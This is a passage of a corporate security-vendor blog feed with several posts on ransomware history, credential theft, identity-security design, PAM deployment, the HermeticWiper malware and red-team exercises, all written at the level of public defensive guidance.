Not all attacks were opportunistic or random in nature during this time. That same year, NotPetya, a massive, highly coordinated ransomware attack targeted Ukrainian government offices and enterprises — foreshadowing current events. Threat actors leveraged a supply chain vulnerability to infiltrate target networks, conduct reconnaissance and methodically plan before launching attacks from the inside. While the initial infections targeted specific organizations in the region, the ransomware soon spilled over into new areas, automatically propagating through interconnected infrastructure and creating global chaos. NotPetya is said to have caused more than $10 billion in damages worldwide.

Attackers continued to evolve their techniques, discovering they could extort their victim organizations more than once: first for the decryption key and second to prevent stolen corporate data from being leaked publicly. The attackers behind the now-defunct Maze ransomware were some of the first to introduce this double-extortion method, demonstrating how backups can serve as double-edged swords. While vital, backups can make it easier for attackers to find and steal sensitive data, since it often exists in two separate places.

Double extortion caught on like wildfire and remains popular today. ThreatPost reported that double-extortion ransomware damage skyrocketed by 935% in 2021 alone. And as attackers continue to evolve, some have added a third extortion layer by demanding payment from the victim organization’s customers or partners.

Ransomware Today: Bolder, Highly Targeted and Turning to the Cloud 

In the past few years, many ransomware actors have narrowed their focus to target specific organizations based on their ability or need to shell out sky-high ransomware payments. This was evident in the dramatic spike in attacks targeting healthcare organizations in 2020 that caused $21 billion in damages.

Increasingly, targeted ransomware attacks are led by highly skilled operators using highly customized methods to reach their goals. After compromising identities to breach an organization, they move and escalate privileges strategically and “live off the land” while learning the ins and outs of the environment. Along the way, they look for ways to disrupt backups, delete shadow copies and unlock files. Only after they’ve achieved high levels of privileged access do they drop the ransomware from within the organization’s network, often following with crippling double-extortion threats.

The December 2020 SolarWinds breach further emboldened ransomware actors, as seen in a rapid-fire series of major attacks on enterprises and critical infrastructure. Among them was the 2021 supply chain ransomware attack on Kaseya that leveraged trusted services’ granted permissions and access to auto-propagate ransomware downstream to managed service providers (MSPs) and their customers around the world.

Meanwhile, the demand for ransomware-as-a-service continues to surge. ZDNet reported that nearly two-thirds of analyzed ransomware attacks in 2020 involved easy-to-use RaaS, which is readily available for purchase or lease on dark web forums. Well-established criminal business operations are scaling their RaaS offerings to meet increasing demand, but they’re not stopping there. A February 2022 U.S. CISA alert highlighted ransomware threat actors’ expanding “professional services” offerings such as payment negotiation services, payment dispute arbitration aid and 24/7 help centers. The CISA alert also highlighted Remote Desktop Protocol (RDP) as one of the top initial infection vectors for ransomware incidents.

The introduction of the BlueKeep and DejaBlue critical vulnerabilities followed by the sharp rise in remote work in 2020 further emphasized potential RDP security risks. In H1 2020, compromised RDP endpoints were the No. 1 source of ransomware incidents, according to several corroborating reports. Similarly, the 2021 Hiscock Cyber Readiness Report revealed that open RDP desktop ports were responsible for 61% of all ransomware insurance claims in 2020 – contributing to surging cyber insurance costs. Continued attacks remind organizations of all sizes to establish secure RDP connections from the start by following best practices such as limiting privileged access, enabling adaptive MFA on network-level authentication (NLA) and keeping RDP servers behind the firewall to avoid exposure.

And as enterprise organizations’ reliance on cloud services continues to grow in support of digital initiatives and work-from-anywhere models, cyber gangs keep moving toward the cloud. So-called “ransomcloud” attacks targeting cloud service customers typically begin with credential theft on an endpoint device, involve lateral movement and privilege escalation in search of valid user credentials for a cloud account and then deploy ransomware from within the cloud environment to encrypt and steal information.

In some cases, threat actors will encrypt data locally and then sync the infected endpoint device to the cloud so data housed there gets encrypted as well. Attackers may find double extortion easier to pull off in cloud environments, since data extraction from the cloud is less likely to trigger any data loss prevention (DLP) controls in place. This is yet another reason for organizations to double-down on defense-in-depth by layering protection and detection mechanisms and following foundational best practices such as removing local admin rights from endpoints, implementing multi-factor authentication (MFA), consistently enforcing least privilege controls and implementing lifecycle management capabilities.

According to the Allianz Risk Barometer 2022, cyber incidents rank as a top three peril in most countries today, with global respondents naming ransomware as the top cyber threat for the year ahead. Defending against constantly evolving tactics, techniques and procedures (TTPs) is a formidable challenge. That’s why it’s so important to understand how attackers work — to get inside their mind and fight innovation with innovation. Instead of trying to keep determined and (often) well-resourced ransomware actors out, it’s about reversing your gaze and working to protect critical endpoints and systems from the inside out. A combination of ingenuity, agility and a defense-in-depth approach to ransomware protection is key to blocking the path to encryption and outsmarting attackers at their own game.

]]>
Endpoint Credential Theft: How to Block and Tackle at Scale https://www.cyberark.com/blog/endpoint-credential-theft-how-to-block-and-tackle-at-scale/ Fri, 11 Mar 2022 14:00:43 +0000 https://www.cyberark.com/?p=128400 Endpoint Credential Theft: How to Block and Tackle at Scale

Tracking and fixing bugs across digital enterprise environments has always been tricky — and it’s getting even harder. Threat researchers logged a record-breaking number of common vulnerabilities and exposures (CVEs) in 2021, averaging more than 50 per day. That’s according to a recent analysis of the National Vulnerability Database (NVD), a central repository of known vulnerabilities maintained by the National Institute of Standards and Technology (NIST). Where to even begin? With so many flaws and so little time, security teams need to focus on impact — blocking credential theft at the endpoint to counteract numerous identity-based vulnerabilities, both disclosed and not yet discovered.

Why So SeriousSAM? It’s Just One of Many Credential Theft Flaws to Address

Keeping pace with every new disclosed vulnerability is difficult. And patching them all? Forget about it. Instead, most vulnerability management teams work to gauge the level of risk a particular vulnerability poses to their business and tackle remediation steps accordingly.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) offers risk-prioritization guidance on this front and, among other things, recently urged organizations to patch CVE-2021-36934, aka “SeriousSAM” or “HiveNightmare,” based on evidence of active exploitation by threat actors.

SeriousSAM made headlines after it was disclosed in July 2021 as a zero-day, local privilege elevation flaw that enables attackers to obtain account password hashes, including those belonging to privileged users, from the shadow copy of Windows Security Account Manager (SAM) — a database registry file that stores local and remote users’ credentials. By using the credentials of a legitimate privileged identity, the attacker can continue to move deeper into the network, reach Tier 0 assets and potentially compromise the full domain. In short, it’s a serious flaw.

Which is why it’s somewhat surprising that almost eight months later many organizations still need to address SeriousSAM. It also highlights a bigger issue: SeriousSAM is just one of countless ways threat actors can steal stored credentials and use them as a jumping point.

For instance, attackers know that most people don’t regularly clear their web browser cookies, though it’s an important security practice. When hijacked, these cookies can provide attackers with the necessary ingredients to bypass multi-factor authentication (MFA) and single sign-on (SSO) controls, which allows them to readily gain access to critical business applications such as Salesforce, Jira or Slack.

Threat actors continue to innovate and use a variety of credential theft techniques in the wild, such as stealing domain credentials from the local cache and harvesting encrypted service accounts. In trying to patch every identity-centric weakness individually, vulnerability management teams quickly find themselves back in a never-ending game of whack-a-mole.

How Holistic Endpoint Threat Protection Stops the Endless Patching Cycle

Whatever their end goal, attackers almost always start by compromising identities, then move laterally and vertically to escalate privileges in search of their target. In fact, identity compromise through credential theft is the most common initial attack vector today, according to the latest IBM Cost of a Data Breach report — costing organizations an average of $4.37 million per breach.

With this front of mind, many security teams are broadening their approach to credential theft protection. Instead of patching vulnerabilities one by one, they’re addressing the root issue: block all sorts of credential theft attempts from the start — and limiting privileged access more intelligently through automation. This typically involves three key actions:

  1. Putting automated detection controls in place to detect and block theft attempts across browser, operating system and credential stores via software abuse, memory scraping and other attack techniques.
  2. Placing credential “lures” at points along common attack paths. These traps are designed to be relatively easy to compromise. Once an attacker tries to use a seemingly legitimate credential, it sets off alarms, prompting security teams to jump-start an investigation, detect threats faster and reduce dwell time.
  3. Layering Identity Security protections of least privilege enforcement and application control over vulnerability assessment and patching tools to help detect and neutralize threats at the endpoint before attackers have a chance to cause significant damage.

Similar to virtual patching — where security policies are implemented to close vulnerability exploitation pathways in the interim to shield against exploits until a patch is available from the vendor — this approach helps security teams leverage credential theft protection to dramatically reduce risk exposure. If and when individual patches become available and they are feasible to apply, teams can roll out fixes in a more manageable cadence, focus their efforts on key areas of risk, and ultimately, make a greater impact.

 

]]>
The Case for Building Identity Security into Enterprise UX Design https://www.cyberark.com/blog/the-case-for-building-identity-security-into-enterprise-ux-design/ Tue, 08 Mar 2022 14:00:30 +0000 https://www.cyberark.com/?p=128243 The Case for Building Identity Security into Enterprise UX Design

People expect nothing short of exceptional from their personal tech experiences. Yet these lofty, consumer-driven standards haven’t really applied to work-issued technology until recently. Now with ample work-from-anywhere time under their belts, workers are demanding more of the enterprise applications they use to do their jobs. And if user-centric Identity and Access Management (IAM) protections aren’t integrated tightly into enterprise software design, overall product security and quality will likely suffer.

The Evaporating Expectation of Constraint Is Why Security UX Needs an Overhaul

We recently spoke with Brandon Traffanstedt, CyberArk senior director, field technology office, and Khizar Sultan, CyberArk senior director, IAM product strategy and solutions, about business end-users’ shift from what Traffanstedt calls “the expectation of constraint” — and what it means for enterprise software design.

“Maybe your work computer was slower than your devices at home. Maybe you had to change your password every month. But we were mostly okay with it — our brains were wired to accept that when we entered the office; we’d sit down and slow down,” he explains.

But then came the pandemic and the remote work scramble. “If end-users couldn’t get their work done in typical fashion, they improvised, which often meant subscribing to new SaaS applications or taking security shortcuts like reusing the same passwords,” explains Sultan.

After all, he notes, people were at home where they felt safe and accustomed to fast, convenient technology experiences — from streaming movies to gaming to shopping online. Soon, this mental disconnect between corporate constraint and uninhibited technology freedom began to evaporate, and workers began to expect more.

Want to Create a Better Security UX? Start with the End-User

Many enterprise software providers are wisely tracking this push for more flexibility, especially as it pertains to security design. At the same time, they’re rearchitecting security mechanisms to surround individual identities, recognizing it’s now the only practical way to protect system components and data from misuse or harm.

These technologists understand that if end-users can’t easily access or use their applications because of constant requests for re-authentication or blocked access to things they legitimately need, they’ll find ways around IAM protocols. Sultan points to downloading rogue applications or providing the second factor for multi-factor authentication (MFA) without question as common “knee-jerk responses” to access fatigue.

It comes down to “anticipating barriers and removing them,” says Traffanstedt. And that means putting yourself in the end-users’ shoes. Take developers, for example. “These modern power users are operationally minded by default and have to move quickly, so they can be very enterprising when it comes to security workarounds,” he says. They won’t accept constraints, such as proving their identity repeatedly to gain access to resources they need to use regularly.

Overcome Three Common UX Concerns Through Intelligent Security Design

That’s where Identity Security comes in, says Traffanstedt and Sultan. Incorporating technologies that work to secure access — regardless of device or location and at just the right time — into application design can help meet these common user experience (UX) expectations:

1. Eliminate Friction from My Day

End-users need easy access to key applications, data and services. What they don’t need is to juggle more passwords. Bringing real-time attribute and behavior-based context into authentication processes such as MFA and single sign-on (SSO) can help eliminate unnecessary “check points” that slow end-users down — while helping their organizations decrease overall reliance on problematic passwords and credentials.

As Sultan explains it, “Artificial intelligence and machine learning enable a more open-world work approach by baselining end-user habits and activity and dynamically adjusting authentication measures based on risk.” For instance, if a worker typically accesses the same resources from the same IP address at roughly the same time each day, authentication requests can be automatically scaled back to the minimum. If a deviation is detected from this “normal” behavior, access can be restricted until a stronger round of authentication happens.

2. Keep Me in the Loop

While ease of use should be the goal, Traffanstedt is quick to point out that less friction does not equal less information. If an end-user is granted just-in-time privileged access to do a job, for example, they need to be informed that their privileged session activity is being recorded.

“People don’t want to jump through security hoops, but they do need transparency about systems in place and confirmation that they are working,” he says. This confirmation can be as simple as a pop-up that lets the user know, “‘Hey, we automatically took care of authentication for you. Isn’t that cool?’”

Judicious security control and more transparency also go a long way in strengthening an organization’s security culture in which end-users feel empowered, but they also understand that vigilance and security are now part of everyone’s job.

3. Show Me Your Support

In such a competitive job market, employees expect more than just fair compensation and meaningful work. They’re also looking for empathy — an employer that prioritizes well-being across multiple dimensions. In fact, 83% of employees say they would leave their organization for a more empathetic employer. And sometimes, it’s the more subtle aspects of workforce empathy that can make a big impact.

A key example: ensuring that technology serves as an enabler, not a barrier, for employees doing their jobs. Especially in a time when 78% of remote workers say technology issues related to connecting to corporate systems and resources are their biggest hurdle to doing their jobs effectively.

Corporate leaders who prioritize the improvement of employee experiences can gain a true ROI on empathy as it pertains to product innovation and employee engagement. And security leaders concur: 86% say end-user experience optimization is “important” or “very important.”

Embrace Identity Security to Elevate Experiences

Real-time intelligence and analytics make it possible to infuse user-centric Identity Security policies into enterprise product design. This not only empowers workers to perform at their full potential, but it also shows their employers care enough about their success to protect them from threats that could undermine their hard work.

The ability to simultaneously enhance customers’ security postures, strengthen employer-employee connections and exceed end-user expectations is a powerful competitive differentiator for technology providers. And that, agree Traffanstedt and Sultan, means a world of opportunity for the companies that can rise to the occasion and deliver on a brand promise that connects directly to exceptional, highly secure experiences.

]]>
What to Do with Your “Second Chance” at Identity Security Success https://www.cyberark.com/blog/what-to-do-with-your-second-chance-at-identity-security-success/ Thu, 03 Mar 2022 14:00:59 +0000 https://www.cyberark.com/?p=128162 What to Do with Your “Second Chance” at Identity Security Success

At the start of the pandemic, security decision makers were focused on making remote work feasible — fast. They revamped Identity and Access Management (IAM) strategies, cobbled together what they had and accomplished technical feats in tight timeframes. They worked around the clock, made some tough calls and cultivated unexpected new leadership skills along the way.

Today, these security leaders are turning those rapid response plans into permanent Zero Trust-centered cybersecurity programs. You could call this the “era of second chances,” as CyberArk Chief Strategy Officer and Head of Corporate Development Clarence Hinton recently described it during a fireside chat featuring a Forrester analyst. But the pressure is on to get it right.

The Era of Second Chances for Security Decision-Makers

“We’ve seen three megatrends — digital transformation, cloud migration and the shift left — in flight for some time,” said Hinton. “The pandemic had a dual effect of accelerating each of those trends, while introducing the work-from-anywhere dynamic.”

Now, two years into countless iterations of “the new normal,” there’s actually no such thing as “normal” at all: some workers are back in the office, others are on the road, some are at home and many others are taking it day by day. Meanwhile, technology keeps moving to the cloud to enable anywhere, anytime innovation and improve both customer and employee experiences. And across the now-borderless enterprise, the number of human and machine identities continues to climb.

“Each human user has a different level of access to different corporate systems. Machines — from RPA bots to API calls — each have their own entitlements, though they’re often overlooked or poorly controlled. And out of the gate, there can be thousands of entitlements to any given cloud platform,” said Hinton. He described this untenable situation as an “overall proliferation of privileges” and that “we’ve reached a point where ‘identity’ and ‘privilege’ have become almost synonymous.”

All the while, attackers keep innovating. “From big game hunters and organized cyber crime syndicates to nation state actors, it’s safe to say we’re in the most expansive cyber threat landscape ever seen,” Hinton said.

On the bright side, security leaders’ show-me-the-money cries are finally being answered as cybersecurity becomes a Board-level issue. Between the budgets they’ve earned and lessons they’ve learned, many teams now have an opportunity to modernize their IAM infrastructures with Identity Security technologies that enable greater agility and pave the way for Zero Trust.

Four Tips for Smarter Security Spending

There’s a sense of urgency — which is a good thing. But you must have a plan, cautioned Hinton. It may seem on the surface that achieving Zero Trust is a bit like boiling the ocean — instead, the challenge should be broken into achievable initiatives based on risk. So, the question becomes, “How do I sequence my security spending in the most effective way possible?”

Hinton shared perspectives on how the following steps can help drive more informed decision-making:

  • Conduct a maturity assessment. Even if you’ve done one before, do it again. It’s like getting a regular health physical: you’ll see what’s in great shape and pinpoint deficiencies to address before they become real problems.
  • Align with business priorities. Map security controls to key business priorities and see how well they line up. Perhaps your organization is planning to launch a new digital transformation initiative and your on-premises Privileged Access Management (PAM) system won’t scale to meet the needs of the program. Such gaps should be high on your priority list.
  • Identify high-risk areas. Determine where you can mitigate the most risk in the shortest amount of time. For instance, organizations will often prioritize protections for identities — and their related privileged credentials — that can be exploited to control an entire environment, such as domain admin and cloud admin accounts. For some organizations, this may first require a discovery exercise to uncover identity and privileged access-related weaknesses across hybrid, cloud and DevOps environments.
  • Examine your metrics. Take a hard look at the security metrics you have in place. Are they truly useful in demonstrating program maturity and overall value? And are you reporting these metrics effectively to stakeholders at various levels of the business? Incorporating these foundational elements into your reporting architecture can help optimize your existing program and find new opportunities for automatization and standardization.

These steps can help you prioritize your efforts but always keep the larger picture in mind.  “There is no shortcut or easy button — you have to approach security holistically,” Hinton said.

Passwordless: A Zero Trust Priority

For many security and IAM leaders, tackling the password problem is a top item on their lists. “You could argue that passwords are the weakest link,” Hinton said. They’re so often what attackers use to get in the door and what attackers go after once they’re inside to escalate privileges. Not to mention end users, who juggle 80+ passwords on average, are fatigued or fed up entirely with passwords.

“The concept of a passwordless environment has been around for some time, but until recently, it was mostly wishful thinking — the stuff of science fiction,” Hinton continued. “But now, device-based authentication, biometrics and even behavioral analytics are making passwordless more attainable.” Industry standards such as FIDO are also evolving alongside technology to help reduce the world’s reliance on passwords and make authentication simpler and stronger.

With identity at the forefront of security conversation, now is a good time for security leaders to put that passwordless pilot program into motion, encouraged Hinton. It will be a big shift, so start small. For instance, work first with your IT team, which is typically comprised of highly privileged users, and then expand to a business unit that’s willing to partner with you through some initial growing pains. It’s a long-tail approach, but it’s one that will ultimately benefit everyone.

A strong passwordless experience — one that authenticates each identity with a high degree of accuracy — is a foundational Zero Trust component. When combined with broad least privilege enforcement, context-aware access controls and continuous monitoring mechanisms, organizations have a structured way to secure each identity — human or machine — without slowing things down.

In looking for ways to maximize this “second chance” at IAM success, consider the business impact of your security spending decisions, Hinton encouraged. Enhanced productivity, user experiences and customer value are what define successful companies. And that’s what an identity-centric approach to security can do.

]]>
Mission: Cyber Resilience https://www.cyberark.com/blog/mission-cyber-resilience/ Fri, 25 Feb 2022 20:35:12 +0000 https://www.cyberark.com/?p=127601

With all eyes on Ukraine, CISOs and other security leaders are heeding the call of governments and intelligence agencies to “shield up.”

In recent weeks, nation-state threat actors have ramped up attacks from DDoS, destructive wiper malware and espionage to website defacement, influence operations and disinformation campaigns targeting Ukrainian infrastructure and civilians alike.

Nothing is certain in the uncharted cyber battle theater and, as NotPetya showed the world, such threats can quickly morph and escalate, creating waves far beyond their initial targets. In a February 25 SANs Institute webinar, SANS senior instructor and former DoD cyber expert Jake Williams noted that collateral damage from the devastating 2017 NotPetya attacks demonstrated the extent to which infrastructure around the world is connected through unfiltered B2B VPNs. As this interconnectedness remains largely the same today, any mass-spillover event will likely still be fueled by automated propagation, he cautioned.

As cyber defenders scrutinize their security strategies, infrastructures and regional suppliers for weaknesses, resilience is core to their mission.

The U.S. Cybersecurity and Infrastructure Agency (CISA) is emphasizing security leaders’ crucial role as defenders of national security, economic prosperity and public safety. In new guidance issued as part of its “Shields Up” awareness campaign, the agency urges corporate leaders to empower their CISOs with both resources and top-down support needed to bolster their organization’s cybersecurity posture during this time.

We strongly encourage organizations to review best practices outlined by CISA, SANS and other leading cyber authorities to help improve cyber readiness and resilience, with a strong emphasis on the following:

  • Take steps to help ensure all available software updates have been made and current patches are fully installed.
  • Maximize existing investments in continuous monitoring and detection capabilities to identify anomalous behavior quickly, relying on AI and automation to scale coverage.
  • Closely examine your network of remote vendors to identify providers working in affected geographies. Enforce necessary precautions, such as network traffic monitoring and strong access controls.
  • Inventory your B2B VPNs, block high-risk protocols on them and be prepared to disconnect them, should it become necessary, per SANS guidance.
  • Revisit your contingency plans and test backup procedures.
  • Minimize potential attack impact by enforcing key identity-centric security practices, such as requiring multi-factor authentication (MFA) and monitoring privileged sessions.

With constant vigilance and an assume breach mindset, you can boost your cyber resilience and defend your organization with confidence.

We at CyberArk remain steadfast in our mission to help organizations secure their most valuable assets — no matter the current risk environment. This commitment extends to our own security practices and standards. To learn how we are continuously enhancing our cybersecurity posture, visit the CyberArk Trust Center.

Additional reading and resources:

 

]]>
HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far) https://www.cyberark.com/blog/hermeticwiper-what-we-know-about-new-malware-targeting-ukrainian-infrastructure-thus-far/ Thu, 24 Feb 2022 23:05:45 +0000 https://www.cyberark.com/?p=127578 HermeticWiper Malware Targets Ukraine

As geopolitical tensions continue to mount, reports are emerging of a new wiper malware targeting Ukrainian infrastructure, such as government departments. Symantec and ESET research first tweeted about the new strain, dubbed HermeticWiper, on February 23. The malware has since been observed in the neighboring countries of Latvia and Lithuania. This follows a string of distributed denial-of-service (DDoS) cyber attacks and other recent threats in the region.

CyberArk Labs is closely following this unfolding situation. The HermeticWiper infections observed thus far appear to follow a familiar path: initial foothold achieved by exploitation of external-facing servers and compromised identities leveraged to move laterally. And, as is so often the case, privileged access appears to play a critical role in these attacks.

Based on initial analysis, the team has identified some specific characteristics of the malware:

  • Attacks are highly targeted: So far, the HermeticWiper attacks have been highly targeted. Specifically, the distribution of the wiper does not seem to be leveraging supply chain vulnerabilities or other “super-spreader” techniques to scale the attacks. This means that infection will not quickly spill to other geographies. However, initial analysis of the wiper does not reveal scoping parameters such as keyboard language settings, clock time zone, external IPs, etc., meaning the malware — or variants of the malware — may eventually spread to other targets in other countries. 
  • Deployment requires privileged admin rights: The wiper leverages high privileges on the compromised host to make the host “unbootable” by overriding the boot records and configurations, erasing device configurations and deleting shadow copies (backups). Similar tactics were observed in the 2017 NotPetya ransomware attacks, which also targeted Ukrainian infrastructure initially.
  • Active Directory can be used as a launchpad: In one reported case, the wiper software deployed using Active Directory group policy, which means the threat actors had privileged access to Active Directory. This scenario is more commonly used in targeted, human-operated incidents, such as the 2021 Kaseya ransomware supply chain attack.
  • Identity compromise is critical: It appears that the wiper is configured to NOT encrypt domain controllers. This allows the domain to keep running, enabling the wiper software to utilize valid credentials to authenticate to servers and encrypt those. This highlights the critical role of identity in these attacks. By stealing or abusing the identities and credentials of employees or authorized third parties, threat actors can access the target network and/or move laterally.

Because HermeticWiper requires the compromise of identities and the abuse of privileged credentials, risk mitigation efforts should focus on endpoint privileged access controls, such as the removal of local admin rights and credential theft protection. Highly privileged credentials, such as those for Active Directory and other Tier 0 assets, should be protected to help prevent lateral movement and network infection.

CyberArk Labs continues to seek new samples and variants of this malware and will share the results of additional testing and analysis as it becomes available.

 

]]>
How to Fast-Track Your PAM Deployment for Rapid Risk Reduction https://www.cyberark.com/blog/how-to-fast-track-your-pam-deployment-for-rapid-risk-reduction/ Wed, 23 Feb 2022 14:00:06 +0000 https://www.cyberark.com/?p=127555 How to Fast-Track Your PAM Deployment for Rapid Risk Reduction

Maybe your security team is facing an upcoming audit. Maybe you’ve failed one and need to address the audit findings. Or maybe you’re working to improve cyber readiness in the face of ransomware and other advanced attacks. No matter your reason for rolling out Identity Security solutions to secure human and machine identities across your organization, you need to move fast to address your most urgent Privileged Access Management (PAM) requirements in the shortest amount of time possible.

To get up and running quickly, selecting a SaaS-delivered Privileged Access Management solution is a no-brainer for protecting the attack path to your organization’s most valuable assets. But, as with any technology deployment, you still need a solid plan in place to streamline implementation and realize rapid time to value. Based on learnings from global customer deployments, our CyberArk Security Services team has identified repeatable, scalable practices to help organizations fast-track their Privileged Access Management deployments, reduce risk quickly and lay the foundation for a comprehensive Zero Trust security approach.

But before we dig in, here’s a refresher on why preventing the compromise of privileged credentials is so crucial to strengthening overall cybersecurity posture.

The Leading Role of Privileged Access in Identity-Based Attacks

With the adoption of modern infrastructure, cloud services and hybrid work models, privileged accounts and credentials are everywhere — from critical applications and IoT devices to robotic process automation (RPA) and DevOps tools. And while every organization’s IT environment is different, adversaries understand they can attack virtually any business by:

  1. Acquiring a valid set of credentials for an identity (human or machine) and using them to gain unauthorized access to sensitive data and systems.
  2. Moving laterally through the network/IT estate to uncover new levels of privileged access and find high-value assets
  3. Using elevated privileges to steal confidential information or disrupt services

Privileged Access Pathway for Identity Based Attacks

With elevated privileged access and permissions to sensitive data and resources, attackers can begin to exfiltrate customer information, financial data or intellectual property. Or they can threaten to shut down systems or leak sensitive data unless a ransom is received. Either way, the outcome is the same: expensive and painful remediation that consumes security teams’ cycles and resources — which were already stretched to the limit.

Proactively Protect Your Digital Business Fast

Based on recommendations from NIST and other leading authorities, along with learnings from work with organizations around the globe, here’s a framework for accelerated, high-impact Privileged Access Management deployments. Following these best practices can help you break the cyber attack chain and achieve rapid risk and audit mitigation.

Phase 1: Discovery and Planning

  • Know where you are. Use automation to quickly inventory sensitive or compliance-tagged assets within your environment and the privileged accounts used to support them. Define your critical assets — those that, if brought down or breached, could seriously impact your company’s ability to support its mission — and evaluate the strength of existing controls.
  • Define where you want to go. With a solid baseline of your environment, outline your goals (both long- and short-term) and key use cases. Hold architecture workshops to review enterprise integrations (i.e., directory, authentication and monitoring tools). These sessions should identify operational considerations like staffing dependencies, technical status of related projects and timelines for executing key use cases. In these sessions, map out the personnel and access control processes necessary for a smooth implementation — and clearly define metrics and success criteria.
  • Remove barriers by getting stakeholders on board. Implementing a Privileged Access Management program is as much about people as it is about the technology. Speed your deployment —and help ensure your program’s long-term success — by securing buy-in and support from executive leadership and establishing a change management strategy for staffing and end user adoption from the start.

Phase 2: Deployment 

  • Test first to save time later. As the saying goes, measure twice, cut once. For example, when organizations deploy the CyberArk Privileged Access Management SaaS solution, a lightweight server or virtual machine is deployed alongside the customer’s environment. This allows teams to walk through common workflows and use cases before integrating them into production.
  • Create repeatable workflows. When incorporating learnings from the discovery and testing phases, begin onboarding critical assets while documenting processes so they can be easily repeated as the program expands to new areas.
  • Focus on high-risk targets. Many organizations will conduct an intensive “sprint” to quickly mitigate their greatest areas of risk. This often starts by securing identities and associated privileged accounts that can be exploited to control an entire environment, such as domain admin and cloud admin accounts. From there, it’s wise to lock down accounts used to service your most widely used technology platforms. This is often followed by implementing OS-level least-privileged access controls across workstations, laptops, desktops and virtual desktop instances (VDIs) to help block endpoint attacks such as ransomware from progressing.

Phase 3: Expansion

  • Demonstrate successes to mature your program. Report time-to-value wins from the initial “sprint” to business leaders, relaying efforts in meaningful, relatable terms like reduced risk of downtime, revenue loss or regulatory penalties. Describe additional steps and investments required to further bolster security and unlock operational efficiencies.
  • Codify fundamental practices. As you extend Identity Security controls to strengthen your defenses, formalize and scale these recurring Privileged Access Management practices: account onboarding, testing onboarded accounts, eliminating excess privileges and permissions, and collecting end-user feedback to continuously improve processes.
  • Tackle advanced Identity Security use cases. Set finite goals for what comes next. This may include protecting and monitoring sessions for all identities accessing sensitive servers, applications or cloud consoles. Other key use cases include removing local admin rights on servers and workstations, eliminating excessive cloud permissions or securing application credentials and continuous integration/development (CI/CD) pipelines. Continuously assess the effectiveness of your plan, adjusting as needed.

Whether stemming from audit findings, compliance needs or response to heightened risk of attack, protecting identities and their associated privileged credentials is a top priority for many organizations today. Fortunately, significant risk reduction does not have to take long. By following proven recommendations from the CyberArk Identity Security Blueprint across people, process and technology domains, your organization can fast-track your Privileged Access Management deployment to strengthen your defenses and build a long-term roadmap for achieving the highest levels of protection.

]]>
How Red Teams Challenge Thinking and Put Cyber Defenses to the Test https://www.cyberark.com/blog/how-red-teams-challenge-thinking-and-put-cyber-defenses-to-the-test/ Thu, 10 Feb 2022 14:00:20 +0000 https://www.cyberark.com/?p=127411 How Red Teams Challenge Thinking and Put Cyber Defenses to the Test

Have you ever read the popular children’s series Where’s Waldo? or looked at one of those 3D Magic Eye images that took the ’90s by storm? The basic premise for both is to spot a hidden person or object within a larger puzzle. But sometimes the harder you stare, the less you find. Then, someone peers over your shoulder and points out Waldo hiding behind a tree, and somehow that elusive “magic” image comes into focus. That’s what a cybersecurity Red Team can do: challenge your thinking by helping you see things you couldn’t see before.

Why We All Need a Second Opinion

As humans, we each process information and solve problems differently. Our knowledge and personal experiences influence the way we view the world and have a huge impact on the decisions we make. As a result, we form “cognitive biases,” or unconscious flaws in our thinking, as our brains try to simplify complex ideas and situations.

First introduced in 1972 by Israeli psychologists Amos Tversky and Daniel Kahneman, the concept of cognitive bias can take many forms. For instance, attentional bias is when we prioritize certain things while ignoring others. Like when you’ve fallen in love with an 1800s Colonial-style house for its charm and top-ranked school district but brush aside the aging electrical system and sagging roofline. And by “you,” we may mean “us,” but that’s another story for another day.

Another bias, functional fixedness, impedes our ability to think outside the box and find new ways to solve problems. It’s the idea that you’ve always used a paper clip to keep pages together and can’t contrive alternate uses for the object like fixing a zipper or opening a lock. And then there’s the optimism bias — aka the illusion of invulnerability — that tricks us into believing negative experiences “won’t happen to me.”

Our inherent cognitive biases are why we need others to provide a second set of eyes or play devil’s advocate to help us think critically about the flipside of an issue, expand our view of the world and, hopefully, avoid damaging missteps. Red Teams were created along these very ideas: to put assumptions and plans through the wringer to make teams more resilient.

Red Teaming and the Art of Alternative Analysis

Red Teaming is a concept first introduced by the military to help shed such cognitive biases and test strategies from an external point of view. In a simulated wargame, the Red Team acts as the adversary, using various techniques and tools to try to penetrate defenses.

The U.S. University of Foreign Military and Cultural Studies (UFMCS) defines Red Teaming as “a function executed by trained, educated and practiced team members that provides commanders an independent capability to fully explore alternatives in plans, operations, concepts, organizations and capabilities in the context of the operational environment and from the perspectives of our partners, adversaries and others.” Red Teaming is built on four principles: self-awareness and reflection; fostering cultural empathy; groupthink mitigation and decision support; and applied critical thinking.

Because cognitive bias affects us all, teams across public and private sectors can benefit from an outsider’s look at their processes. Fans of Aaron Sorkin’s The Newsroom will recall when an outside Red Team was assembled to poke holes in a high-stakes investigative news story and test the credibility of its source, unbeknownst to the journalists assigned to the project. Similarly, real-world law enforcement and legal teams use Red Team techniques to uncover weaknesses in their cases and improve trial advocacy. And as organizations face an endless barrage of cyber threats, many are conducting independent Red Team exercises to get inside the mind of an attacker and put their cybersecurity defenses to the test.

How Adversary Simulations Can Help You Find Flaws Before Cyber Attackers Do

Red Team adversary simulations provide a safe, controlled way for security operations teams to uncover vulnerabilities, test response capabilities and identify areas of improvement. Red Teamers use any means necessary to mimic a real-world attack without introducing risk to the business. Organizations often engage independent Red Teams who bring advanced skills, fresh perspectives and objectivity to the table — along with the element of surprise — which is hard to achieve with an in-house group.

The Red Team works closely with the organization to determine the goals of the program based on its unique concerns and requirements. The organization may choose to test against known threats — by following the MITRE ATT&CK framework to simulate indicators of compromise (IoCs) associated with a specific threat actor — or unknown threats — by developing custom tools designed to penetrate the environment, pivot within the network and exfiltrate data.

As the global ransomware epidemic continues to grow and wreak havoc, many corporations are engaging Red Teams to identify technology and process gaps to improve cyber readiness. For these exercises, Red Teams design and execute specialized defense analysis programs that aim to encrypt local system files and evade various security technologies the organization may have in place such as anti-virus, endpoint detection and response solutions, and special-purpose ransomware prevention tools. In response, the organization’s security team — the Blue Team — executes its incident response process to contain the infected host, prevent further execution and recover the affected files.

At the end of the exercise, organizations often receive a two-part takeaway. The first report is a 50,000-foot view of the organization’s security posture with key findings and risk-prioritized recommendations for the executive team. The second is a technical analysis that details information on the vulnerabilities uncovered and recommended remediation steps to reduce exposure for security teams. With deeper insights into their security strengths and weaknesses, organizations can bolster defenses and create a baseline from which future security improvements can be measured.

